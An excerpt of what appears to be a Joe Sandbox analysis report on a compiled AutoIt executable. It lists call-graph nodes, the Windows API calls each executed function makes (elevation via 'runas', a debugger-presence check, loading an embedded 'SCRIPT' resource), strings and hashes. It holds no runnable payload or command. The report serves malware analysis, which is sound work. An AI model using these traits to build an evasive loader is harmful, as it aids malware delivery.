lstrcmpiW 99868->99869 99870 6d76a5 CoTaskMemFree 99869->99870 99871 6d76a2 99869->99871 99870->99867 99871->99870 99872 683633 99873 68366a 99872->99873 99874 683688 99873->99874 99875 6836e7 99873->99875 99912 6836e5 99873->99912 99876 68375d PostQuitMessage 99874->99876 99877 683695 99874->99877 99879 6836ed 99875->99879 99880 6bd31c 99875->99880 99906 6836d8 99876->99906 99881 6bd38f 99877->99881 99882 6836a0 99877->99882 99878 6836ca DefWindowProcW 99878->99906 99884 6836f2 99879->99884 99885 683715 SetTimer RegisterWindowMessageW 99879->99885 99928 6911d0 10 API calls Mailbox 99880->99928 99932 6e2a16 71 API calls _memset 99881->99932 99888 6836a8 99882->99888 99889 683767 99882->99889 99886 6836f9 KillTimer 99884->99886 99887 6bd2bf 99884->99887 99890 68373e CreatePopupMenu 99885->99890 99885->99906 99924 6844cb Shell_NotifyIconW _memset 99886->99924 99899 6bd2f8 MoveWindow 99887->99899 99900 6bd2c4 99887->99900 99894 6836b3 99888->99894 99895 6bd374 99888->99895 99917 684531 99889->99917 99890->99906 99892 6bd343 99929 6911f3 341 API calls Mailbox 99892->99929 99904 68374b 99894->99904 99905 6836be 99894->99905 99895->99878 99931 6d817e 59 API calls Mailbox 99895->99931 99896 6bd3a1 99896->99878 99896->99906 99899->99906 99901 6bd2c8 99900->99901 99902 6bd2e7 SetFocus 99900->99902 99901->99905 99907 6bd2d1 99901->99907 99902->99906 99903 68370c 99925 683114 DeleteObject DestroyWindow Mailbox 99903->99925 99926 6845df 81 API calls _memset 99904->99926 99905->99878 99930 6844cb Shell_NotifyIconW _memset 99905->99930 99927 6911d0 10 API calls Mailbox 99907->99927 99912->99878 99913 68375b 99913->99906 99915 6bd368 99916 6843db 68 API calls 99915->99916 99916->99912 99918 684548 _memset 99917->99918 99919 6845ca 99917->99919 99920 68410d 61 API calls 99918->99920 99919->99906 99923 68456f 99920->99923 99921 6845b3 KillTimer SetTimer 99921->99919 99922 6bd6c0 Shell_NotifyIconW 99922->99921 99923->99921 99923->99922 99924->99903 99925->99906 99926->99913 99927->99906 99928->99892 99929->99905 99930->99915 99931->99912 99932->99896 99933 681055 99938 682649 99933->99938 99936 6a2f80 __cinit 67 API calls 99937 681064 99936->99937 99939 6877c7 59 API calls 99938->99939 99940 6826b7 99939->99940 99945 683582 99940->99945 99943 682754 99944 68105a 99943->99944 99948 683416 59 API calls 2 library calls 99943->99948 99944->99936 99949 6835b0 99945->99949 99948->99943 99950 6835bd 99949->99950 99951 6835a1 99949->99951 99950->99951 99952 6835c4 RegOpenKeyExW 99950->99952 99951->99943 99952->99951 99953 6835de RegQueryValueExW 99952->99953 99954 683614 RegCloseKey 99953->99954 99955 6835ff 99953->99955 99954->99951 99955->99954 99956 6c0251 99968 69fb84 99956->99968 99958 6c0267 99959 6c027d 99958->99959 99960 6c02e8 99958->99960 99977 689fbd 60 API calls 99959->99977 99962 68fe40 341 API calls 99960->99962 99967 6c02dc Mailbox 99962->99967 99963 6c02bc 99963->99967 99978 6e85d9 59 API calls Mailbox 99963->99978 99965 6c0ce1 Mailbox 99967->99965 99979 6ea0b5 89 API calls 4 library calls 99967->99979 99969 69fb90 99968->99969 99970 69fba2 99968->99970 99971 689e9c 60 API calls 99969->99971 99972 69fba8 99970->99972 99973 69fbd1 99970->99973 99976 69fb9a 99971->99976 99974 6a0ff6 Mailbox 59 API calls 99972->99974 99975 689e9c 60 API calls 99973->99975 99974->99976 99975->99976 99976->99958 99977->99963 99978->99967 99979->99965 99980 681066 99985 68f8cf 99980->99985 99982 68106c 99983 6a2f80 __cinit 67 API calls 99982->99983 99984 681076 99983->99984 99986 68f8f0 99985->99986 100018 6a0143 99986->100018 99990 68f937 99991 6877c7 59 API calls 99990->99991 99992 68f941 99991->99992 99993 6877c7 59 API calls 99992->99993 99994 68f94b 99993->99994 99995 6877c7 59 API calls 99994->99995 99996 68f955 99995->99996 99997 6877c7 59 API calls 99996->99997 99998 68f993 99997->99998 99999 6877c7 59 API calls 99998->99999 100000 68fa5e 99999->100000 100028 6960e7 100000->100028 100004 68fa90 100005 6877c7 59 API calls 100004->100005 100006 68fa9a 100005->100006 100056 69ffde 100006->100056 100008 68fae1 100009 68faf1 GetStdHandle 100008->100009 100010 68fb3d 100009->100010 100011 6c49d5 100009->100011 100013 68fb45 OleInitialize 100010->100013 100011->100010 100012 6c49de 100011->100012 100063 6e6dda 64 API calls Mailbox 100012->100063 100013->99982 100015 6c49e5 100064 6e74a9 CreateThread 100015->100064 100017 6c49f1 CloseHandle 100017->100013 100065 6a021c 100018->100065 100021 6a021c 59 API calls 100022 6a0185 100021->100022 100023 6877c7 59 API calls 100022->100023 100024 6a0191 100023->100024 100025 687d2c 59 API calls 100024->100025 100026 68f8f6 100025->100026 100027 6a03a2 6 API calls 100026->100027 100027->99990 100029 6877c7 59 API calls 100028->100029 100030 6960f7 100029->100030 100031 6877c7 59 API calls 100030->100031 100032 6960ff 100031->100032 100072 695bfd 100032->100072 100035 695bfd 59 API calls 100036 69610f 100035->100036 100037 6877c7 59 API calls 100036->100037 100038 69611a 100037->100038 100039 6a0ff6 Mailbox 59 API calls 100038->100039 100040 68fa68 100039->100040 100041 696259 100040->100041 100042 696267 100041->100042 100043 6877c7 59 API calls 100042->100043 100044 696272 100043->100044 100045 6877c7 59 API calls 100044->100045 100046 69627d 100045->100046 100047 6877c7 59 API calls 100046->100047 100048 696288 100047->100048 100049 6877c7 59 API calls 100048->100049 100050 696293 100049->100050 100051 695bfd 59 API calls 100050->100051 100052 69629e 100051->100052 100053 6a0ff6 Mailbox 59 API calls 100052->100053 100054 6962a5 RegisterWindowMessageW 100053->100054 100054->100004 100057 69ffee 100056->100057 100058 6d5cc3 100056->100058 100059 6a0ff6 Mailbox 59 API calls 100057->100059 100075 6e9d71 60 API calls 100058->100075 100062 69fff6 100059->100062 100061 6d5cce 100062->100008 100063->100015 100064->100017 100076 6e748f 65 API calls 100064->100076 100066 6877c7 59 API calls 100065->100066 100067 6a0227 100066->100067 100068 6877c7 59 API calls 100067->100068 100069 6a022f 100068->100069 100070 6877c7 59 API calls 100069->100070 100071 6a017b 100070->100071 100071->100021 100073 6877c7 59 API calls 100072->100073 100074 695c05 100073->100074 100074->100035 100075->100061 100077 681016 100082 684ad2 100077->100082 100080 6a2f80 __cinit 67 API calls 100081 681025 100080->100081 100083 6a0ff6 Mailbox 59 API calls 100082->100083 100084 684ada 100083->100084 100085 68101b 100084->100085 100089 684a94 100084->100089 100085->100080 100090 684a9d 100089->100090 100091 684aaf 100089->100091 100092 6a2f80 __cinit 67 API calls 100090->100092 100093 684afe 100091->100093 100092->100091 100094 6877c7 59 API calls 100093->100094 100095 684b16 GetVersionExW 100094->100095 100096 687d2c 59 API calls 100095->100096 100097 684b59 100096->100097 100098 687e8c 59 API calls 100097->100098 100103 684b86 100097->100103 100099 684b7a 100098->100099 100100 687886 59 API calls 100099->100100 100100->100103 100101 684bf1 GetCurrentProcess IsWow64Process 100102 684c0a 100101->100102 100105 684c89 GetSystemInfo 100102->100105 100106 684c20 100102->100106 100103->100101 100104 6bdc8d 100103->100104 100107 684c56 100105->100107 100117 684c95 100106->100117 100107->100085 100110 684c7d GetSystemInfo 100113 684c47 100110->100113 100111 684c32 100112 684c95 2 API calls 100111->100112 100114 684c3a GetNativeSystemInfo 100112->100114 100113->100107 100115 684c4d FreeLibrary 100113->100115 100114->100113 100115->100107 100118 684c2e 100117->100118 100119 684c9e LoadLibraryA 100117->100119 100118->100110 100118->100111 100119->100118 100120 684caf GetProcAddress 100119->100120 100120->100118

                    Executed Functions

                    Function 00683B4C Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 153windowCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00683B7A
                    • IsDebuggerPresent.KERNEL32 ref: 00683B8C
                    • GetFullPathNameW.KERNEL32(00007FFF,?,?,007462F8,007462E0,?,?), ref: 00683BFD
                      • Part of subcall function 00687D2C: _memmove.LIBCMT ref: 00687D66
                      • Part of subcall function 00690A8D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00683C26,007462F8,?,?,?), ref: 00690ACE
                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00683C81
                    • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,007393F0,00000010), ref: 006BD4BC
                    • SetCurrentDirectoryW.KERNEL32(?,007462F8,?,?,?), ref: 006BD4F4
                    • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00735D40,007462F8,?,?,?), ref: 006BD57A
                    • ShellExecuteW.SHELL32(00000000,?,?), ref: 006BD581
                      • Part of subcall function 00683A58: GetSysColorBrush.USER32(0000000F), ref: 00683A62
                      • Part of subcall function 00683A58: LoadCursorW.USER32(00000000,00007F00), ref: 00683A71
                      • Part of subcall function 00683A58: LoadIconW.USER32(00000063), ref: 00683A88
                      • Part of subcall function 00683A58: LoadIconW.USER32(000000A4), ref: 00683A9A
                      • Part of subcall function 00683A58: LoadIconW.USER32(000000A2), ref: 00683AAC
                      • Part of subcall function 00683A58: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00683AD2
                      • Part of subcall function 00683A58: RegisterClassExW.USER32(?), ref: 00683B28
                      • Part of subcall function 006839E7: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00683A15
                      • Part of subcall function 006839E7: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00683A36
                      • Part of subcall function 006839E7: ShowWindow.USER32(00000000,?,?), ref: 00683A4A
                      • Part of subcall function 006839E7: ShowWindow.USER32(00000000,?,?), ref: 00683A53
                      • Part of subcall function 006843DB: _memset.LIBCMT ref: 00684401
                      • Part of subcall function 006843DB: Shell_NotifyIconW.SHELL32(00000000,?), ref: 006844A6
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                    • String ID: This is a third-party compiled AutoIt script.$runas$%q
                    • API String ID: 529118366-2403565919
                    • Opcode ID: a95ffdfc68c8becb3d74f2d00c296798efac4202dedceab924dce2b4c1ebd87a
                    • Instruction ID: f513c5506ebb34928f6ffd493b841b4ca82a517e734376975e23159baeba31eb
                    • Opcode Fuzzy Hash: a95ffdfc68c8becb3d74f2d00c296798efac4202dedceab924dce2b4c1ebd87a
                    • Instruction Fuzzy Hash: 71511BB5904248BFCF11FBB4DC05DED7B76BB06700F008279F41166252DBB88646CB2A
                    Function 00684FE9 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 62COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1082 684fe9-685001 CreateStreamOnHGlobal 1083 685021-685026 1082->1083 1084 685003-68501a FindResourceExW 1082->1084 1085 6bdd5c-6bdd6b LoadResource 1084->1085 1086 685020 1084->1086 1085->1086 1087 6bdd71-6bdd7f SizeofResource 1085->1087 1086->1083 1087->1086 1088 6bdd85-6bdd90 LockResource 1087->1088 1088->1086 1089 6bdd96-6bddb4 1088->1089 1089->1086
                    APIs
                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00684EEE,?,?,00000000,00000000), ref: 00684FF9
                    • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00684EEE,?,?,00000000,00000000), ref: 00685010
                    • LoadResource.KERNEL32(?,00000000,?,?,00684EEE,?,?,00000000,00000000,?,?,?,?,?,?,00684F8F), ref: 006BDD60
                    • SizeofResource.KERNEL32(?,00000000,?,?,00684EEE,?,?,00000000,00000000,?,?,?,?,?,?,00684F8F), ref: 006BDD75
                    • LockResource.KERNEL32(Nh,?,?,00684EEE,?,?,00000000,00000000,?,?,?,?,?,?,00684F8F,00000000), ref: 006BDD88
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                    • String ID: SCRIPT$Nh
                    • API String ID: 3051347437-2706064246
                    • Opcode ID: c0cbeffe2810abed5d54b743a3439c0c3a866b6109ad1c1c61271b4e5c5a2515
                    • Instruction ID: 00e7d7649cd87b275f313af2876a693dfac5255455a0591d16a06e7901f0e627
                    • Opcode Fuzzy Hash: c0cbeffe2810abed5d54b743a3439c0c3a866b6109ad1c1c61271b4e5c5a2515
                    • Instruction Fuzzy Hash: 00115AB5200700AFD7319B65DC58FAB7BBAEBC9B51F208268F506D66A0DB61E8008760
                    Function 00684AFE Relevance: 10.7, APIs: 7, Instructions: 223COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1146 684afe-684b5e call 6877c7 GetVersionExW call 687d2c 1151 684c69-684c6b 1146->1151 1152 684b64 1146->1152 1153 6bdb90-6bdb9c 1151->1153 1154 684b67-684b6c 1152->1154 1155 6bdb9d-6bdba1 1153->1155 1156 684c70-684c71 1154->1156 1157 684b72 1154->1157 1159 6bdba3 1155->1159 1160 6bdba4-6bdbb0 1155->1160 1158 684b73-684baa call 687e8c call 687886 1156->1158 1157->1158 1168 6bdc8d-6bdc90 1158->1168 1169 684bb0-684bb1 1158->1169 1159->1160 1160->1155 1162 6bdbb2-6bdbb7 1160->1162 1162->1154 1164 6bdbbd-6bdbc4 1162->1164 1164->1153 1166 6bdbc6 1164->1166 1170 6bdbcb-6bdbce 1166->1170 1171 6bdca9-6bdcad 1168->1171 1172 6bdc92 1168->1172 1169->1170 1173 684bb7-684bc2 1169->1173 1174 684bf1-684c08 GetCurrentProcess IsWow64Process 1170->1174 1175 6bdbd4-6bdbf2 1170->1175 1180 6bdc98-6bdca1 1171->1180 1181 6bdcaf-6bdcb8 1171->1181 1176 6bdc95 1172->1176 1177 684bc8-684bca 1173->1177 1178 6bdc13-6bdc19 1173->1178 1182 684c0a 1174->1182 1183 684c0d-684c1e 1174->1183 1175->1174 1179 6bdbf8-6bdbfe 1175->1179 1176->1180 1184 6bdc2e-6bdc3a 1177->1184 1185 684bd0-684bd3 1177->1185 1188 6bdc1b-6bdc1e 1178->1188 1189 6bdc23-6bdc29 1178->1189 1186 6bdc08-6bdc0e 1179->1186 1187 6bdc00-6bdc03 1179->1187 1180->1171 1181->1176 1190 6bdcba-6bdcbd 1181->1190 1182->1183 1191 684c89-684c93 GetSystemInfo 1183->1191 1192 684c20-684c30 call 684c95 1183->1192 1196 6bdc3c-6bdc3f 1184->1196 1197 6bdc44-6bdc4a 1184->1197 1193 6bdc5a-6bdc5d 1185->1193 1194 684bd9-684be8 1185->1194 1186->1174 1187->1174 1188->1174 1189->1174 1190->1180 1195 684c56-684c66 1191->1195 1203 684c7d-684c87 GetSystemInfo 1192->1203 1204 684c32-684c3f call 684c95 1192->1204 1193->1174 1200 6bdc63-6bdc78 1193->1200 1201 6bdc4f-6bdc55 1194->1201 1202 684bee 1194->1202 1196->1174 1197->1174 1205 6bdc7a-6bdc7d 1200->1205 1206 6bdc82-6bdc88 1200->1206 1201->1174 1202->1174 1208 684c47-684c4b 1203->1208 1211 684c41-684c45 GetNativeSystemInfo 1204->1211 1212 684c76-684c7b 1204->1212 1205->1174 1206->1174 1208->1195 1210 684c4d-684c50 FreeLibrary 1208->1210 1210->1195 1211->1208 1212->1211
                    APIs
                    • GetVersionExW.KERNEL32(?), ref: 00684B2B
                      • Part of subcall function 00687D2C: _memmove.LIBCMT ref: 00687D66
                    • GetCurrentProcess.KERNEL32(?,0070FAEC,00000000,00000000,?), ref: 00684BF8
                    • IsWow64Process.KERNEL32(00000000), ref: 00684BFF
                    • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00684C45
                    • FreeLibrary.KERNEL32(00000000), ref: 00684C50
                    • GetSystemInfo.KERNEL32(00000000), ref: 00684C81
                    • GetSystemInfo.KERNEL32(00000000), ref: 00684C8D
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                    • String ID:
                    • API String ID: 1986165174-0
                    • Opcode ID: 344e19792683dfc730e3a29c837f570fe01b12eeaf03fb0298c6fa7c29e0e28d
                    • Instruction ID: ad15b111e6bf7225594f93055d43c46122552c62fffd80dda98da7f74d756b65
                    • Opcode Fuzzy Hash: 344e19792683dfc730e3a29c837f570fe01b12eeaf03fb0298c6fa7c29e0e28d
                    • Instruction Fuzzy Hash: DB91D57154A7C5DEC731DB6884511EAFFEAAF2A300B484E9ED0CB87B01DA64E948C71D
                    Function 006DDA5D Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 121comlibraryloaderCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1213 6dda5d-6ddaab call 6ddc20 1216 6ddb9d-6ddba5 1213->1216 1217 6ddab1-6ddacd CoCreateInstance 1213->1217 1218 6ddacf-6ddadc call 6ddcc1 1217->1218 1219 6ddaee-6ddaf3 1217->1219 1218->1216 1227 6ddae2-6ddae9 1218->1227 1221 6ddaf9-6ddb16 SetErrorMode GetProcAddress 1219->1221 1222 6ddb96 1219->1222 1224 6ddb18-6ddb21 call 6ddd22 1221->1224 1225 6ddb86 1221->1225 1222->1216 1226 6ddb8d-6ddb94 SetErrorMode 1224->1226 1230 6ddb23-6ddb38 1224->1230 1225->1226 1226->1216 1227->1216 1232 6ddb7d-6ddb84 1230->1232 1233 6ddb3a-6ddb3f 1230->1233 1232->1226 1233->1232 1234 6ddb41-6ddb53 1233->1234 1236 6ddb65-6ddb69 1234->1236 1237 6ddb55-6ddb59 1234->1237 1239 6ddb6b 1236->1239 1240 6ddb72-6ddb7b 1236->1240 1237->1236 1238 6ddb5b-6ddb60 call 6ddcc1 1237->1238 1238->1236 1239->1240 1240->1226
                    APIs
                    • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 006DDAC5
                    • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 006DDAFB
                    • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 006DDB0C
                    • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 006DDB8E
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: ErrorMode$AddressCreateInstanceProc
                    • String ID: ,,q$DllGetClassObject
                    • API String ID: 753597075-1480125929
                    • Opcode ID: d18bdb28dafabb330970b27ce0b0b7aae975881343251c94bfa35b77bdeb81ac
                    • Instruction ID: 3f14f98db517bf8aea9f2c76a6f6edc879c1faf40fa8bbe7eae4cf9e9f28d058
                    • Opcode Fuzzy Hash: d18bdb28dafabb330970b27ce0b0b7aae975881343251c94bfa35b77bdeb81ac
                    • Instruction Fuzzy Hash: 01417FB1A00208EFDB15DF54C884A9A7BAAEF44314F1581AFED059F346D7B5DD44CBA0
                    Function 0068FE40 Relevance: 9.8, APIs: 3, Strings: 2, Instructions: 1040COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: BuffCharUpper
                    • String ID: prt$%q
                    • API String ID: 3964851224-2435252290
                    • Opcode ID: 4a342591f06cd40556d189050b5e780adc101e21437b87b882a14200f5385295
                    • Instruction ID: 4dcf8385816c4d6573e233d853c9831c78c974190ea65043b313def69ca63ae6
                    • Opcode Fuzzy Hash: 4a342591f06cd40556d189050b5e780adc101e21437b87b882a14200f5385295
                    • Instruction Fuzzy Hash: 4C9267746083418FEB24DF14C490B6AB7E6FF89304F14896DE89A8B752DB71EC45CB92
                    Function 0068E800 Relevance: 7.4, Strings: 5, Instructions: 1102COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID:
                    • String ID: Dtt$Dtt$Dtt$Dtt$Variable must be of type 'Object'.
                    • API String ID: 0-2218409961
                    • Opcode ID: 1d8be787de1a8ccf3e3a714c45842adeee05d544cc9e8042c6b0ca508dd3f248
                    • Instruction ID: 976394eed48a4ab347d0e3209ed1a7b2c12ddd4fb7bfb4c4d846ca53c647b5ef
                    • Opcode Fuzzy Hash: 1d8be787de1a8ccf3e3a714c45842adeee05d544cc9e8042c6b0ca508dd3f248
                    • Instruction Fuzzy Hash: BEA29C74A04215CFCB24EF98C490AADB7B3FF49304F248269E916AB351D776ED42CB91
                    Function 006E4696 Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON
                    Download Yara Rule
                    APIs
                    • GetFileAttributesW.KERNELBASE(?,006BE7C1), ref: 006E46A6
                    • FindFirstFileW.KERNELBASE(?,?), ref: 006E46B7
                    • FindClose.KERNEL32(00000000), ref: 006E46C7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: FileFind$AttributesCloseFirst
                    • String ID:
                    • API String ID: 48322524-0
                    • Opcode ID: 8bb16e8b2ef216a5218a3a91cb67f382b45752721258c063cc01ced17a19bde3
                    • Instruction ID: 32ca9fd88bf31f27eae876de8064d0711a1c31fff9b446912539c26eb5eb8240
                    • Opcode Fuzzy Hash: 8bb16e8b2ef216a5218a3a91cb67f382b45752721258c063cc01ced17a19bde3
                    • Instruction Fuzzy Hash: 8EE0D8314115009B8620B738EC4D4EE775D9E06335F104715F935C15E0EFB469508599
                    Function 00690B30 Relevance: 64.3, APIs: 27, Strings: 9, Instructions: 1300windowsleeptimeCOMMON
                    Download Yara Rule
                    APIs
                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00690BBB
                    • timeGetTime.WINMM ref: 00690E76
                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00690FB3
                    • TranslateMessage.USER32(?), ref: 00690FC7
                    • DispatchMessageW.USER32(?), ref: 00690FD5
                    • Sleep.KERNEL32(0000000A), ref: 00690FDF
                    • LockWindowUpdate.USER32(00000000,?,?), ref: 0069105A
                    • DestroyWindow.USER32 ref: 00691066
                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00691080
                    • Sleep.KERNEL32(0000000A,?,?), ref: 006C52AD
                    • TranslateMessage.USER32(?), ref: 006C608A
                    • DispatchMessageW.USER32(?), ref: 006C6098
                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 006C60AC
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Message$DispatchPeekSleepTranslateWindow$DestroyLockTimeUpdatetime
                    • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$prt$prt$prt$prt
                    • API String ID: 4003667617-960707843
                    • Opcode ID: e569b8de3c80766e04ff58c01943f0deb17f60d997c855ab85fd5414c3b2faec
                    • Instruction ID: 665523899b454a7e85f66e3c6ceb2782e907360756d84c4e9b96a588f290a370
                    • Opcode Fuzzy Hash: e569b8de3c80766e04ff58c01943f0deb17f60d997c855ab85fd5414c3b2faec
                    • Instruction Fuzzy Hash: 1FB2C170608741DFDB28DF24C884FAAB7E6FF85304F144A1DE44A876A1DB75E885CB86
                    Function 006E93DF Relevance: 19.8, APIs: 13, Instructions: 322fileCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                      • Part of subcall function 006E91E9: __time64.LIBCMT ref: 006E91F3
                      • Part of subcall function 00685045: _fseek.LIBCMT ref: 0068505D
                    • __wsplitpath.LIBCMT ref: 006E94BE
                      • Part of subcall function 006A432E: __wsplitpath_helper.LIBCMT ref: 006A436E
                    • _wcscpy.LIBCMT ref: 006E94D1
